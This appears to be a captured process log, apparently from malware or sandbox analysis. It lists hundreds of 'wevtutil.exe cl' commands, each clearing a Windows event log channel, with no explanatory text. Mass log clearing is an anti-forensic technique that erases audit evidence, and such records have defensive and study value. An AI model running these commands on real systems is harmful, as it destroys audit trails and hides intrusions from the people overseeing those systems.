wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Data-Pdf/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DataIntegrityScan/CrashRecovery"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deduplication/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deduplication/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deduplication/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deduplication/Scrubbing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Defrag-Core/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DesktopActivityModerator/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DesktopWindowManager-Diag/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceAssociationService/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceConfidence/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceGuard/Verbose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceManagement-Enterprise-Diagnostics-Provider/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSetupManager/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceUpdateAgent/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Devices-Background/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-AdvancedTaskManager/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D12/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D12/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D12/PerfTiming"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D9/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3DShaderCache/Default"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectComposition/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectManipulation/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Disk/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dism-Api/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dism-Api/ExternalAnalytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dism-Api/InternalAnalytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dism-Cli/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Documents/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dot3MM/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DucUpdateAgent/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dwm-API/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dwm-Core/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dwm-Dwm/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dwm-Redir/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dwm-Udwm/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl-Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Contention"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Power"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EDP-Application-Learning/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EDP-Audit-Regular/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EDP-Audit-TCB/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EFS/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ESE/IODiagnose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ESE/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapMethods-RasChap/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapMethods-RasTls/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapMethods-Sim/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapMethods-Ttls/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/EventLog"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Energy-Estimation-Engine/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EnhancedStorage-EhStorTcgDrv/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FeatureConfiguration/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Catalog/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-ConfigManager/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Core/WHC"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/BackupLog"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Engine/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-EventListener/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-Service/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileHistory-UI-Events/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-GPIO-ClassExtension/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-GenericRoaming/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HAL/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HelloForBusiness/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Help/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HotspotAuth/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HttpService/Log"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-Guest-Drivers/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-Hypervisor-Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-NETVSC/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Hyper-V-VID-Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IE-SmartScreen"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IKE/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-Broker/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-CandidateUI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManager/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-CustomerFeedbackManagerUI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-JPAPI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-JPLMP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-JPPRED/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-JPSetting/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-JPTIP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-KRAPI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-KRTIP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-OEDCompiler/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-TCCORE/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-TCTIP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IME-TIP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IPNAT/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IPxlatCfg/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IdCtrls/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IdCtrls/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IndirectDisplays-ClassExtension-Events/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Input-HIDCLASS-Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-InputSwitch/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-KdsSvc/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kerberos/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/General"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-AppCompat/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-ApphelpCache/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-IO/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Interrupt-Steering/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-IoTrace/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-LiveDump/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Pdc/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Pep/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Boot Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Configuration Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Device Enumeration Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Driver Watchdog"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-ShimEngine/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"

C:\Windows\system32\wevtutil.exe

